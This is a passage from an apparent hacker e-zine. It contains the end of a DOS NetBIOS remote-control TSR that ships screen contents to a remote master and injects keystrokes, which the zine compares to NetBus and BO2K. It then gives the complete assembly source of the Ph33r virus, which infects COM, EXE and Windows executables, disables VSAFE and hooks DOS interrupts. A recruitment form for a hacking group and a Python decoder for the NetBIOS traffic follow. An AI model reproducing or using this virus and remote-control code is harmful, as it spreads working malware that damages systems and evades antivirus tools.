        Assume CS:_TEXT, DS:_TEXT
        mov     ax, cs
        mov     ds, ax
        mov     QuadrantCounter, 0
I8_Semaphore:
        Cmp     InInt8, 0
        JE      I8_Sess_Switch
        Jmp     I8_RestoreRegs
I8_Sess_Switch:
        cmp     SessionActive, 1
        je      I8_ChkHotIRQs
br_to_exit:
        jmp     Int08Exit
I8_ChkHotIRQs:
        mov     InInt8, 1
        Mov     AL, 0bh
        Out     20h, AL
        In      AL, 20h
        Cmp     AL, 0
        JE      I8_ChkScreen
        Jmp     Int08Exit
I8_ChkScreen:
        cmp     send_ncb.CMD_CPLT, 0FFh
        je      br_to_exit
Next_Quadrant:
        inc     Quadrant
        add     Quadrant_Ofs, 500
        cmp     Quadrant, 9
        jne     ChkThisSection
        mov     Quadrant, 1
        mov     Quadrant_Ofs, 0
ChkThisSection:
        les     di, VideoPtr
        mov     ax, Quadrant_Ofs
        mov     si, offset ScreenSave
        add     si, ax
        add     di, ax
        mov     cx, 250
        repe    cmpsw
        jne     I8_SaveScreen
        inc     QuadrantCounter
        cmp     QuadrantCounter, 8
        je      ChkShape
        jmp     I8_ChkScreen
ChkShape:
        mov     ax, 0040h
        mov     es, ax
        mov     ax, word ptr es:[0060h]
        cmp     ax, CursorShape
        jne     I8_SaveScreen
        mov     ax, word ptr es:[0050h]
        cmp     ax, CursorLoc
        jne     I8_SaveScreen
        jmp     Int08Exit
I8_SaveScreen:
        push    cs
        pop     es
        mov     ax, Quadrant_Ofs
        mov     di, offset ScreenSave
        lds     si, VideoPtr
        add     si, ax
        add     di, ax
        mov     cx, 250
        rep     movsw
        push    cs
        pop     ds
I8_BldPacket:
        mov     ax, Quadrant_Ofs
        mov     ScreenPos, ax
        mov     ax, 0040h
        mov     es, ax
        mov     ax, word ptr es:[0060h]
        mov     CursorShape, ax
        mov     ax, word ptr es:[0050h]
        mov     CursorLoc, ax
        mov     ax, word ptr es:[001Ah]
        mov     Head2, ax
        mov     ax, cs
        mov     es, ax
        mov     si, offset ScreenSave
        add     si, Quadrant_Ofs
        mov     di, offset ScreenPkt
        mov     cx, 250
        rep     movsw
I8_SendScreen:
        mov     dx, cs
        mov     ax, offset Screen_Data
        mov     cx, 508
        mov     bp, 0
        mov     bx, 0
        mov     si, offset master_name
        call    Send_Msg
Int08Exit:
        mov     InInt8, 0
I8_RestoreRegs:
        pop     es
        pop     ds
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
I8_Sw_Stack2:
        cli
        mov     ss, cs:SS_Save1
        mov     sp, cs:SP_Save1
        iret

        Assume CS:_TEXT, DS:Nothing
;---------------------------------------
; POST routine for the RECEIVE_DATAGRAM: handles session open/close requests
; and otherwise copies MASTER's keystrokes into the BIOS keyboard buffer.
Kbd_Receive:
        mov     cs:SS_Save2, ss
        mov     cs:SP_Save2, sp
        mov     ss, cs:StackSeg2
        mov     sp, cs:StackOfs2
        sti
        cld
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    ds
        push    es
        Assume CS:_TEXT, DS:_TEXT
        mov     ax, cs
        mov     ds, ax
Chk_RetCode:
        cmp     recv_ncb.CMD_CPLT, 0
        je      ChkDone
        jmp     KR_RecvKbd
ChkDone:
        cmp     Sess_Flag, -1
        je      KR_CloseSess
        cmp     Sess_Flag, 1
        je      KR_OpenSess
        jmp     KR_StuffBuffer
KR_CloseSess:
        mov     SessionActive, 0
        mov     ax, 0040h
        mov     es, ax
        cli
        mov     byte ptr es:[0017h], 0
        mov     byte ptr es:[0018h], 0
        mov     ax, word ptr es:[0080h]
        mov     word ptr es:[001Ah], ax
        mov     word ptr es:[001Ch], ax
        sti
        mov     ax, ds
        mov     es, ax
        jmp     KR_RecvKbd
KR_OpenSess:
        mov     ax, 0040h
        mov     es, ax
        cli
        mov     byte ptr es:[0017h], 0
        mov     byte ptr es:[0018h], 0
        mov     ax, word ptr es:[0080h]
        mov     word ptr es:[001Ah], ax
        mov     word ptr es:[001Ch], ax
        sti
        mov     ax, ds
        mov     es, ax
KR_ResetScrn:
        mov     di, offset ScreenSave
        mov     ax, 0
        mov     cx, 2000
        rep     stosw
        mov     CursorShape, 0
        mov     CursorLoc, 0
PingBack:
        mov     ScreenPos, -1
        mov     dx, cs
        mov     ax, offset Screen_Data
        mov     cx, 8
        mov     bp, 0
        mov     bx, 0
        mov     si, offset master_name
        call    Send_Msg
KR_WaitCplt:
        cmp     send_ncb.CMD_CPLT, 0FFh
        je      KR_WaitCplt
        mov     SessionActive, 1
        jmp     KR_RecvKbd
KR_StuffBuffer:
        mov     ax, 0040h
        mov     es, ax
        cli
        mov     al, KbdFlag1
        mov     byte ptr es:[0017h], al
        mov     al, KbdFlag2
        mov     byte ptr es:[0018h], al
        mov     al, AltInput
        mov     byte ptr es:[0019h], al
        mov     ax, Tail
        mov     word ptr es:[001Ch], ax
        mov     di, 001Eh
        mov     si, offset KbdBuffer
        mov     cx, 16
        rep     movsw
        sti
KR_RecvKbd:
        mov     dx, cs
        mov     ax, offset Kbd_Data
        mov     cx, 39
        mov     bp, cs
        mov     bx, offset Kbd_Receive
        call    Recv_Msg
        Assume CS:_TEXT, DS:Nothing
Kbd_Exit:
        pop     es
        pop     ds
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        cli
        mov     ss, cs:SS_Save2
        mov     sp, cs:SP_Save2
        iret
;---------------------------------------
EndResident Label Byte
        DB 0
;---------------------------------------
Start:
        Assume CS:_TEXT, DS:_DATA, ES:Nothing
        mov     ax, @DATA
        mov     ds, ax
        mov     ax, cs
        mov     cs:StackSeg1, ax
        mov     ax, offset OurStack1
        mov     cs:StackOfs1, ax
        mov     ax, cs
        mov     cs:StackSeg2, ax
        mov     ax, offset OurStack2
        mov     cs:StackOfs2, ax
save_int8:
        mov     ax, 3508h
        int     21h
        mov     cs:oldint08_seg, ES
        mov     cs:oldint08_ofs, BX
get_dos_vers:
        mov     ax, 3000h
        int     21h
        mov     cs:dos_major, al
        mov     cs:dos_minor, ah
        cmp     al, 2
        ja      netbios_test1
wrong_dos:
        mov     bx, 2
        mov     dx, offset Msg2
        mov     cx, Msg2Len
        mov     ah, 40h
        int     21h
        mov     ax, 4C00h
        int     21h
netbios_test1:
        mov     ax, 0
        mov     es, ax
        cmp     word ptr es:[0170h], 0     ; Int 5Ch vector present?
        jne     netbios_test2
no_netbios:
        mov     bx, 2
        mov     dx, offset Msg3
        mov     cx, Msg3Len
        mov     ah, 40h
        int     21h
prog_exit:
        mov     ax, 4C00h
        int     21h
netbios_test2:
        mov     cs:send_ncb.COMMAND, 7Fh   ; invalid command: NetBIOS answers RETCODE 3
        mov     cs:send_ncb.RETCODE, 0
        mov     cs:send_ncb.CMD_CPLT, 0FFh
        mov     ax, cs
        mov     es, ax
        mov     bx, offset send_ncb
        Int     5Ch
        cmp     cs:send_ncb.RETCODE, 3
        jne     no_netbios
bw_or_color:
        mov     ah, 0Fh
        int     10h
        Cmp     AL, 7
        JE      SetMono
        Jmp     LookFurther
SetMono:
        Mov     cs:VideoSeg, 0B000h
        Mov     cs:VideoOfs, 0000
        Jmp     get_psp
LookFurther:
        Mov     bx, 0FF10h
        Mov     ah, 12h
        Int     10h
        Test    bh, 0FEh
        JZ      EGAPresent
        Jmp     SetCGA
EGAPresent:
        LES     BX, EGAFlagPtr
        Mov     AL, Byte Ptr ES:[BX]
        Test    AL, 00000101b
        JNZ     SetCGA
        Test    AL, 00000100b
        JNZ     SetMono
        Test    AL, 00000001b
        JNZ     SetMono
EGAIsActive:
        Mov     cs:VideoSeg, 0B800h
        Mov     cs:VideoOfs, 0000
        Jmp     get_psp
SetCGA:
        Mov     cs:VideoSeg, 0B800h
        Mov     cs:VideoOfs, 0000
get_psp:
        mov     ax, 5100h
        int     21h
        mov     cs:our_psp, bx
        dec     bx
        mov     cs:our_mcb_seg, bx
network_name:
        mov     bx, 2
        mov     dx, offset Msg4
        mov     cx, Msg4Len
        mov     ah, 40h
        int     21h
        call    Add_Our_Name
        mov     al, cs:add_name_ncb.NUM
        mov     cs:OurNameNumber, al
        cmp     cs:add_name_ncb.CMD_CPLT, 0
        je      install_int8
        jmp     prog_exit
install_int8:
        push    ds
        mov     dx, offset Int_08
        push    cs
        pop     ds
        mov     ax, 2508h
        int     21h
        pop     ds
say_hello:
        mov     bx, 2
        mov     dx, offset Msg1
        mov     cx, Msg1Len
        mov     ah, 40h
        int     21h
First_Recv:
        mov     dx, cs
        mov     ax, offset Kbd_Data
        mov     cx, 39
        mov     bp, cs
        mov     bx, offset Kbd_Receive
        call    Recv_Msg
issue_tsr:
        Mov     AX, cs
        Sub     AX, cs:our_psp
        Mov     BX, Offset EndResident
        Mov     CX, 4
        Shr     BX, CL
        Inc     BX
        Add     AX, BX
        Mov     DX, AX
        Mov     AH, 31h
        Int     21h
        End     Start
[END SLAVE.ASM]

The program is indeed very basic, but it shows the principle behind NetBus and BO2K.

[---------------------------------]

4. The Ph33r virus from VLAD
~~ ~~~ ~~~~~ ~~~~~ ~~~~ ~~~~

NOTE: This virus was written for the A86 assembler.

;
;
; Ph33r
;
; Qark/VLAD
;
;
;
; This virus is the first ever DOS/Windows virus, infecting COM/EXE/WinEXE
; files.
; The technology of the Windows infection is superior to 'Winsurfer'
; in that the virus goes directly resident, without having to mess around
; infecting the Windows 'shell'. The Windows entry of the virus allocates
; memory, points a selector to it, copies the virus into the space and
; sets interrupt 21h to the resident virus. By careful programming it was
; possible to make both the DOS and Win interrupt handlers share the same
; code.
;
; The virus does a few interesting things:
;     Disables MSAV by turning it off (DOS)
;     Gets the original Int 21h using DOSSEG:109Eh (DOS)
;     Won't infect a number of filenames 'AV' 'AN' 'OT' (DOS & Win)
;
; A few annoying things:
;     If the DOS handler traps Int 21h AH=3Dh Windows crashes on load.
;     If the virus infects WIN386.EXE Windows crashes on load.
;     These have both been fixed, by removal.
;
; For some unknown reason, the virus causes Debug to crash on exit.
; I haven't fixed this, because I figure anyone who uses Debug will spot
; the virus anyway. Besides which, I haven't got a clue why it's happening :)
;
; For this virus, AVP & TBAV pick up nothing whilst F-Prot detects it
; heuristically.
;
org 0 com_entry: ;COM files begin execution here. call exec_start push es pop ds ;COM file exit.
mov di,100h push di db 0b8h ;MOV AX,xxxx old2 dw 20cdh stosw db 0b8h ;MOV AX,xxxx old4 dw 0 stosw xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di ret exe_entry: ;EXE files begin execution here. call exec_start push es pop ds ;Setup ss:sp mov ax,ds add ax,10h db 5 ;ADD AX,xxxx old_ss dw 0 mov ss,ax db 0bch ;MOV SP,xxxx old_sp dw 0 ;setup the return mov ax,ds add ax,10h db 5 ;ADD AX,xxxx exe_cs dw 0 push ax db 0b8h ;MOV AX,xxxx exe_ip dw 0 push ax xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di retf Exec_Start: cld mov ax,51ffh ;Test resident. int 21h cmp ax,0ff51h je exit_virus mov ax,0fa02h ;Kill VSAFE. mov dx,5945h ;Every DOS6+ user has a copy of this. xor bl,bl int 16h mov ax,ds dec ax mov ds,ax ;MCB seg in DS. xor di,di cmp byte ptr [di],'Y' ;Z block ? ja allocate exit_virus: ret allocate: sub word ptr [di+3],(offset virus_size*2/16)+1 sub word ptr [di+12h],(offset virus_size*2/16)+1 mov ax,word ptr [di+12h] push es mov es,ax push cs pop ds mov cx,offset virus_size ;Get delta offset in SI call next next: pop si sub si,offset next ;Move virus to free memory. rep movsb mov ds,cx ;DS=CX=0 from REP MOVSB ;Set int21h mov si,21h*4 mov di,offset i21 push si movsw movsw pop si mov di,offset orig21 movsw movsw mov word ptr [si-4],offset int21handler mov word ptr [si-2],es push es mov ah,52h ;Thanx Neurobasher! int 21h mov ax,es pop es mov ds,ax mov si,109eh ;DS:109Eh = Original Int 21 I hope. lodsw cmp ax,9090h jne reset21 lodsb cmp al,0e8h jne reset21 mov word ptr es:orig21,10a0h mov word ptr es:orig21+2,ds reset21: pop es ret db '=Ph33r=' win21: ;Windows interrupt handling begins here. cmp ax,51feh jne non_w_res xchg al,ah iret non_w_res: cmp ax,4b00h ;Execute. je check_infect cmp ah,3dh ;File Open. je check_infect cmp ah,56h ;Rename. je check_infect cmp ah,43h ;Chmod. jne int_exit check_infect: pushf pusha push ds push es mov ax,0ah ;This function makes our CS writable. 
mov bx,cs int 31h mov es,ax call setup_infect pop es pop ds popa popf jmp int_exit int21handler: ;DOS interrupt handling begins here. cmp ax,51ffh jne non_res xchg al,ah iret db 'Qark/VLAD' non_res: ;For some reason, checking for AH=3dh crashes windows when its booting. cmp ax,4b00h ;Execute. je do_file cmp ah,6ch ;Open. je do_file cmp ah,56h ;Rename. je do_file cmp ah,43h ;Chmod. je do_file int_exit: db 0eah i21 dd 0 do_file: push es push dx cmp ah,6ch jne no_6c_fix mov dx,si no_6c_fix: push cs pop es call setup_infect pop dx pop es jmp int_exit setup_infect: ;on entry to this call, es=writable cs ;ds:dx=filename pushf push ax push bx push cx push dx push si push di push ds push es cld mov si,dx asciiz: lodsb cmp al,0 jne asciiz sub si,4 lodsw or ax,2020h cmp ax,'xe' ;EXE je do_inf cmp ax,'ld' ;DLL je do_inf cmp ax,'oc' ;COM jne not_name do_inf: cmp word ptr [si-5],'68' ;Dont infect WIN386.EXE (hangs) je not_name mov ax,word ptr [si-5] or ax,2020h ;Lowercase. cmp ax,'va' ;Don't touch files that end in AV je not_name ;eg TBAV cmp ax,'vd' ;DV.COM checks DV.EXE je not_name cmp ax,'na' ;Don't touch files that end in AN je not_name ;eg SCAN, TBSCAN cmp ax,'to' ;Don't touch files that end in OT je not_name ;eg F-PROT call infect not_name: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf ret Infect: ;DS:DX=Filename, ES=our data segment cld mov ax,3d02h ;Open file to be infected. call int21h jnc file_opened ret file_opened: xchg bx,ax ;File handle into BX. push es pop ds mov ah,3fh ;Read from file. mov cx,512 mov dx,offset virus_size call int21h mov si,offset virus_size mov ax,word ptr [si] or ax,2020h cmp ax,'zm' ;Test for EXE header je check_exe jmp com_infect check_exe: cmp word ptr [si+12h],0afafh ;Infection marker. jne not_infected bad_mem: jmp com_end not_infected: cmp word ptr [si+18h],40h ;Windows executable. 
jb exe_infect jmp windows_infect exe_infect: cmp word ptr [si+0ch],-1 ;Maxmem = All jne bad_mem call lseek_end ;Get file length in DX:AX or dx,dx jnz ok_exe_size cmp ax,1000 jb bad_mem ok_exe_size: mov cx,512 div cx inc ax cmp [si+4],ax ;Check for overlays. ja bad_mem mov ax,word ptr [si+0eh] ;Save the original SS:SP mov word ptr old_ss,ax mov ax,word ptr [si+10h] mov word ptr old_sp,ax mov ax,word ptr [si+14h] ;Save the original CS:IP mov word ptr exe_ip,ax mov ax,word ptr [si+16h] mov word ptr exe_cs,ax call lseek_end mov cx,16 div cx sub ax,word ptr [si+8] add dx,offset exe_entry mov word ptr [si+14h],dx ;New IP mov word ptr [si+16h],ax ;New CS dec ax mov word ptr [si+0eh],ax add dx,1500 and dx,0fffeh mov word ptr [si+10h],dx call save_time mov cx,offset virus_size mov ah,40h xor dx,dx call int21h call lseek_end mov cx,512 div cx or dx,dx jz no_page_fix inc ax no_page_fix: mov word ptr [si+4],ax mov word ptr [si+2],dx call lseek_start mov word ptr [si+12h],0afafh ;Set infection marker. mov ah,40h mov dx,si mov cx,1ch call int21h call restore_time jmp com_end com_infect: cmp byte ptr [si+3],0afh ;Com infection marker. je com_end ;Save first four com file bytes. mov di,offset old2 movsw mov di,offset old4 movsw mov ax,4202h ;Lseek to file end. xor cx,cx cwd call int21h or dx,dx ;Check if > 64k jnz com_end cmp ax,60000 ;Check if > 60000 ja com_end cmp ax,1024 jb com_end sub ax,3 mov word ptr com_jmp+1,ax call save_time mov ah,40h ;Write virus body to file. mov cx,offset virus_size xor dx,dx call int21h jc com_end mov ax,4200h ;Lseek to file start. xor cx,cx cwd call int21h mov ah,40h ;Write jump to start of file. mov cx,4 mov dx,offset com_jmp call int21h com_time_end: call restore_time com_end: mov ah,3eh ;Close file. call int21h ret windows_infect: ;Move the Newexe pointer forward. 
push word ptr [si+3ch] pop word ptr newexe_off sub word ptr [si+3ch],8 cmp word ptr [si+3eh],0 ;Dont want any NE headers at off >64k jne com_end mov word ptr [si+12h],0afafh ;Set infection marker. ;Lseek back to start of the file. mov ax,4200h xor cx,cx cwd call int21h call save_time ;Write header back. mov ah,40h mov cx,512 mov dx,offset virus_size call int21h jc com_end ;Lseek to new exe header mov ax,4200h mov dx,word ptr newexe_off xor cx,cx call int21h ;Read in new exe header mov ah,3fh mov cx,512 mov dx,offset virus_size call int21h ;Adjust header pointers mov ax,word ptr [si+22h] ;AX=Segment table offset. cmp word ptr [si+4],ax jb ok_et add word ptr [si+4],8 ok_et: cmp word ptr [si+24h],ax jb ok_rt add word ptr [si+24h],8 ok_rt: cmp word ptr [si+26h],ax jb ok_rnt add word ptr [si+26h],8 ok_rnt: cmp word ptr [si+28h],ax jb ok_mrt add word ptr [si+28h],8 ok_mrt: cmp word ptr [si+2ah],ax jb ok_int add word ptr [si+2ah],8 ok_int: mov ax,word ptr [si+1ch] inc word ptr [si+1ch] ;Increase segment count. xor dx,dx mov cx,8 mul cx add ax,word ptr [si+22h] ;AX=Offset of segment table end. adc dx,0 mov cx,512 ;512 byte portions are used ; for the reads later on. div cx mov word ptr ne_size,ax mov word ptr last_ne,dx ;Put the original CS:IP into our relocation table. push word ptr [si+14h] pop word ptr old_ip push word ptr [si+16h] pop word ptr old_cs ;Save the alignment shift count because we need that for calculating ;the offset of our segment when writing the segment entry. push word ptr [si+32h] pop word ptr al_shift ;Point CS:IP to the virus. mov word ptr [si+14h],offset win_entry ;The new IP mov ax,word ptr [si+1ch] mov word ptr [si+16h],ax ;The new CS ;Initialise the lseek variable push word ptr newexe_off pop word ptr lseek ;The below code gets the NE header and keeps moving it forward by ;eight bytes in 512 byte chunks. move_header_forward: mov ax,word ptr ne_size or ax,ax jz last_page dec word ptr ne_size mov ax,4200h ;Lseek to our current position. 
xor cx,cx mov dx,word ptr lseek sub dx,8 call int21h mov ah,40h ;Write the header section out. mov cx,512 mov dx,si call int21h add word ptr lseek,512 mov ax,4200h ;Lseek to the next chunk. xor cx,cx mov dx,word ptr lseek call int21h mov ah,3fh ;Read it. mov dx,offset virus_size mov cx,512 call int21h jmp move_header_forward last_page: mov ax,4202h ;Lseek to end of file. xor cx,cx cwd call int21h ;File length into DX:AX ;DX:AX=File offset of our segment ;Below section shifts the segment offset right by the alignment ;shift value. mov cl,byte ptr al_shift push bx mov bx,1 shl bx,cl mov cx,bx pop bx div cx mov word ptr lseek_add,0 or dx,dx jz no_extra sub cx,dx mov word ptr lseek_add,cx inc ax no_extra: mov di,si add di,word ptr last_ne ;Adding the new segment table entry mov word ptr [di],ax ;Segment offset mov word ptr [di+2],offset virus_size mov word ptr [di+4],180h ;Segment attribute ; 180h = NonMovable + Relocations mov word ptr [di+6],offset virus_size+512 mov ax,4200h ;Lseek to next position. xor cx,cx mov dx,word ptr lseek sub dx,8 call int21h mov ah,40h ;Write rest of NE header + new seg entry. mov cx,word ptr last_ne add cx,8 ;Added segment entry means eight more. mov dx,offset virus_size call int21h ;Reset the relocatable pointer. push word ptr winip push word ptr wincs mov word ptr winip,0 mov word ptr wincs,0ffffh mov ax,4202h ;Lseek to end of file. xor cx,cx mov dx,word ptr lseek_add call int21h mov ah,40h ;Write main virus body. mov cx,offset virus_size xor dx,dx call int21h pop word ptr wincs pop word ptr winip mov ah,40h ;Write the relocation item. mov cx,offset reloc_end - offset relocblk mov dx,offset relocblk call int21h jmp com_time_end int21h: ;Simulated int 21 call. pushf call dword ptr cs:orig21 ret orig21 dd 0 win_entry: ;WinEXE files begin execution here. pusha push ds push es mov ax,51feh ;Residency test. int 21h cmp ax,0ff51h je no_wintsr mov ax,000ah ;Make CS writable. mov bx,cs int 31h ;Use DPMI. 
mov ds,ax mov ax,0204h ;Get real mode interrupt vector. mov bl,21h int 31h mov word ptr i21,dx ;Save int21 mov word ptr i21+2,cx mov word ptr orig21,dx mov word ptr orig21+2,cx mov ax,501h xor bx,bx ;Allocate Linear region mov cx,offset v_mem_size int 31h push bx push cx xor ax,ax mov cx,1 ;Create a Selector int 31h mov bx,ax mov ax,7 pop dx ;Point selector to linear region. pop cx int 31h mov ax,8 xor cx,cx ;Set selector limit mov dx,offset v_mem_size int 31h mov es,bx mov cx,offset v_mem_size xor si,si ;Copy virus to the linear region xor di,di cld rep movsb mov bx,es mov ax,9 ;Set access rights to 'Code' mov cx,0ffh int 31h mov cx,es mov dx,offset win21 mov ax,205h mov bl,21h int 31h ;Set real mode interrupt vector. mov ax,4 push es pop bx ;Lock the selector int 31h no_wintsr: pop es pop ds popa db 0eah ;Return to original file. winip dw 0 wincs dw 0ffffh ;----------------------- ;Infection Procedures ;----------------------- Save_Time: push ax push cx push dx mov ax,5700h call int21h mov word ptr time,cx mov word ptr date,dx pop dx pop cx pop ax ret Restore_Time: push ax push cx push dx db 0bah ;MOV DX,xxxx date dw 0 db 0b9h ;MOV CX,xxxx time dw 0 mov ax,5701h call int21h pop dx pop cx pop ax ret Lseek_Start: mov al,0 jmp short lseek2 Lseek_End: mov al,2 lseek2: mov ah,42h xor cx,cx cwd call int21h ret ;----------------------- ;Infection Data ;----------------------- ;Com infection data. com_jmp db 0e9h,0,0,0afh ;----------------------- ;Windows infection data. newexe_off dw 0 al_shift dw 0 ne_size dw 0 last_ne dw 0 lseek dw 0 lseek_add dw 0 Relocblk: dw 1 ;Number of relocation items db 3 ;32bit pointer relocation db 4 ;Additive relocation dw offset winip old_cs dw 0 ;The stored original CS & IP of host. old_ip dw 0 Reloc_end: ;----------------------- virus_size: db 512 dup (0) ;Storage buffer. v_mem_size: [---------------------------------] 6. Join the BadSector Hacking Alliance. 
~~ ~~~~ ~~~ ~~~~~~~~~ ~~~~~~~ ~~~~~~~~~

There are only 4 memberz of the BadSector Hacking Alliance; we are currently looking for expansion into other countries so we can destroy any competing groups that may be around. If you wish to join, just fill out the form below, send it to th0r@hackermail.com and mark the subject as "BadSector application".

Handle                : 
Past Handles*         : 
e-mail                : 
website*              : 
Computer Platform*    : 
Programming Languages : 
AGE                   : 
Occupation*           : 
Groups* (Past/Present): 
Country               : 
Spoken Languages      : 

(Items marked with a * are not necessary)

1. Which are you interested in?: Hacking [ ], Phreaking [ ], Virii [ ], Programming (NOT virii) [ ], Becoming an *OFFICIAL* BadSector sysop [ ].
2. Are you a member of *ANY* law enforcement agency or military organisation? YES [ ], NO [ ].
3. Do you realise that lying about the above question will void any legal prosecution of *ANY* current BadSector members? YES [ ], NO [ ].
4. Do you have any experience of hacking/phreaking/virii coding?: YES [ ], NO [ ].
5. Have you got "3l33t" access to any BBS (Bulletin Boards) in your area/country?: YES [ ], NO [ ].
6. What do you think you could offer BadSector that they do not already have?: ____________________
________________________________________________________________________________________________
________________________________________________________________________________________________
________________________________________________________________________________________________
7. How did you hear of BadSector?: BBS [ ], Colleague [ ], Friend [ ], IRC [ ], Newsgroup(s) [ ], Internet [ ], Other: ___________________________________________
8. Have you any experience of any of the title(s) you are applying for?: YES [ ], NO [ ].

[---------------------------------]

That's all folks, 'til next time......
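Appendix to the NetBIOS remote administration section: the SLAVE.ASM listing is, in effect, the wire-format documentation of a screen-and-keyboard remote control channel. The slave registers the NetBIOS name "Slave", its timer hook sends any changed 500-byte screen quadrant to "Master" as a datagram (Screen_Data, 508 bytes, or an 8-byte ping with ScreenPos = -1 when a session opens), and its receive POST routine copies the 39-byte Kbd_Data datagram straight into the BIOS keyboard buffer at 0040:001E. The Python below is an added example, not code from the zine or from Barry Nance: it decodes the 64-byte NCB and both datagram payloads using the field layouts and command equates from the listing, so a defender can read what such traffic carries from a captured NetBIOS datagram. The sample buffers and the scan codes in DIR_KEYS are constructed, not captured.

```python
import struct

# Command codes from the SLAVE.ASM equates. Each command appears twice on the page: the
# no-wait code (bit 7 set, completion signalled through POST_FUNC) and the _WAIT code.
NCB_COMMANDS = {
    0x32: "RESET", 0x35: "CANCEL", 0xB3: "STATUS", 0xF9: "TRACE", 0x70: "UNLINK",
    0xB0: "ADD_NAME", 0xB6: "ADD_GROUP_NAME", 0xB1: "DELETE_NAME",
    0x90: "CALL_CMD", 0x91: "LISTEN", 0x92: "HANG_UP", 0x94: "SEND",
    0xF1: "SEND_NO_ACK", 0x97: "CHAIN_SEND", 0xF2: "CHAIN_SEND_NO_ACK",
    0x95: "RECEIVE", 0x96: "RECEIVE_ANY", 0xB4: "SESSION_STATUS",
    0xA0: "SEND_DATAGRAM", 0xA2: "SEND_BCST_DATAGRAM",
    0xA1: "RECEIVE_DATAGRAM", 0xA3: "RECEIVE_BCST_DATAGRAM",
}
NO_WAIT = 0x80

NCB_FMT = "<BBBB HH H 16s 16s BB HH BB 14s"   # NCB struc: 64 bytes, far pointers as offset,segment
KBD_FMT = "<BBB hH 16H"                        # Kbd_Data: KbdFlag1, KbdFlag2, AltInput, Sess_Flag, Tail, 16 words
SCREEN_HDR_FMT = "<hHHH"                       # Screen_Data header: ScreenPos, CursorShape, CursorLoc, Head2
KBD_BUF_START = 0x1E                           # BIOS keyboard ring buffer starts at 0040:001E
assert (struct.calcsize(NCB_FMT), struct.calcsize(KBD_FMT)) == (64, 39)


def decode_name(raw: bytes) -> str:
    """NetBIOS names are 16 bytes; SLAVE.ASM pads with spaces and a trailing zero."""
    return raw.rstrip(b"\x00").rstrip().decode("ascii", "replace")


def parse_ncb(buf: bytes) -> dict:
    (cmd, retcode, lsn, num, buf_off, buf_seg, length, callname, ourname,
     rto, sto, post_off, post_seg, lana, cmd_cplt, _res) = struct.unpack(NCB_FMT, buf[:64])
    if cmd in NCB_COMMANDS:
        name = NCB_COMMANDS[cmd]
    elif (cmd | NO_WAIT) in NCB_COMMANDS:
        name = NCB_COMMANDS[cmd | NO_WAIT] + "_WAIT"
    else:
        name = f"UNKNOWN_{cmd:02X}"
    return {
        "command": name, "retcode": retcode, "lsn": lsn, "name_number": num,
        "buffer": f"{buf_seg:04X}:{buf_off:04X}", "length": length,
        "callname": decode_name(callname), "ourname": decode_name(ourname),
        "post_routine": f"{post_seg:04X}:{post_off:04X}", "lana": lana,
        # SLAVE.ASM stores 0FFh in CMD_CPLT before Int 5Ch and polls until NetBIOS changes it.
        "pending": cmd_cplt == 0xFF,
    }


def parse_kbd_data(buf: bytes) -> dict:
    """Decode the 39-byte datagram MASTER sends; Kbd_Receive copies it into the BIOS data area."""
    flag1, flag2, alt_input, sess_flag, tail, *words = struct.unpack(KBD_FMT, buf[:39])
    if sess_flag == -1:
        action = "close_session"      # KR_CloseSess: stop screen updates, clear keyboard state
    elif sess_flag == 1:
        action = "open_session"       # KR_OpenSess: reset screen cache, send the 8-byte ping back
    else:
        action = "inject_keys"        # KR_StuffBuffer: copy flags, Tail and 16 words to 0040:0017..
    # Tail is the BIOS buffer tail pointer, so (Tail - 1Eh) / 2 words of the buffer are live.
    live = max(0, min(16, (tail - KBD_BUF_START) // 2))
    keys = [(w & 0xFF, w >> 8) for w in words[:live]]    # (ASCII, scan code), BIOS convention
    return {"action": action, "shift_flags": (flag1, flag2), "alt_input": alt_input,
            "tail": tail, "keys": keys,
            "text": "".join(chr(a) for a, _ in keys if 32 <= a < 127)}


def parse_screen_data(buf: bytes) -> dict:
    """Decode the datagram the slave sends from Int_08: a ping (8 bytes) or one 500-byte quadrant."""
    pos, shape, loc, head = struct.unpack(SCREEN_HDR_FMT, buf[:8])
    if pos == -1 or len(buf) < 508:
        return {"kind": "session_ack", "kbd_head": head}
    cells = buf[8:508]                                    # 250 cells of (character, attribute)
    first_cell = pos // 2
    return {"kind": "quadrant", "quadrant": pos // 500 + 1,
            "first_row": first_cell // 80, "first_col": first_cell % 80,
            "cursor": (loc >> 8, loc & 0xFF),             # 0040:0050 holds row in the high byte
            "cursor_shape": shape, "kbd_head": head,
            "text": cells[0::2].decode("cp437")}


# ---- constructed sample buffers (not captured traffic) ----
def netbios_name(name: str) -> bytes:
    return name.encode("ascii").ljust(15) + b"\x00"

def build_quadrant(text: str, pos: int = 0) -> bytes:
    cells = b"".join(bytes([ord(c), 0x07]) for c in text.ljust(250))
    return struct.pack(SCREEN_HDR_FMT, pos, 0x0607, 0x0007, KBD_BUF_START) + cells

SAMPLE_NCB = struct.pack(NCB_FMT, 0xA0, 0, 0, 3, 0x0106, 0x1A2B, 508,
                         netbios_name("Master"), netbios_name("Slave"),
                         0, 0, 0, 0, 0, 0xFF, b"\x00" * 14)
DIR_KEYS = [0x2064, 0x1769, 0x1372, 0x1C0D]               # 'd','i','r',Enter as ASCII | scan << 8
SAMPLE_KBD = struct.pack(KBD_FMT, 0, 0, 0, 0, KBD_BUF_START + 2 * len(DIR_KEYS),
                         *(DIR_KEYS + [0] * 12))
SAMPLE_OPEN = struct.pack(KBD_FMT, 0, 0, 0, 1, 0, *([0] * 16))
SAMPLE_ACK = struct.pack(SCREEN_HDR_FMT, -1, 0, 0, KBD_BUF_START)

if __name__ == "__main__":
    print(parse_ncb(SAMPLE_NCB))
    print(parse_kbd_data(SAMPLE_KBD))
    print(parse_screen_data(build_quadrant("C:\\>dir"))["text"].rstrip())
```

Head2 in the screen packet is the BIOS buffer head pointer (0040:001A), which is how the master can tell how many of the keys it injected have been consumed before sending more.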
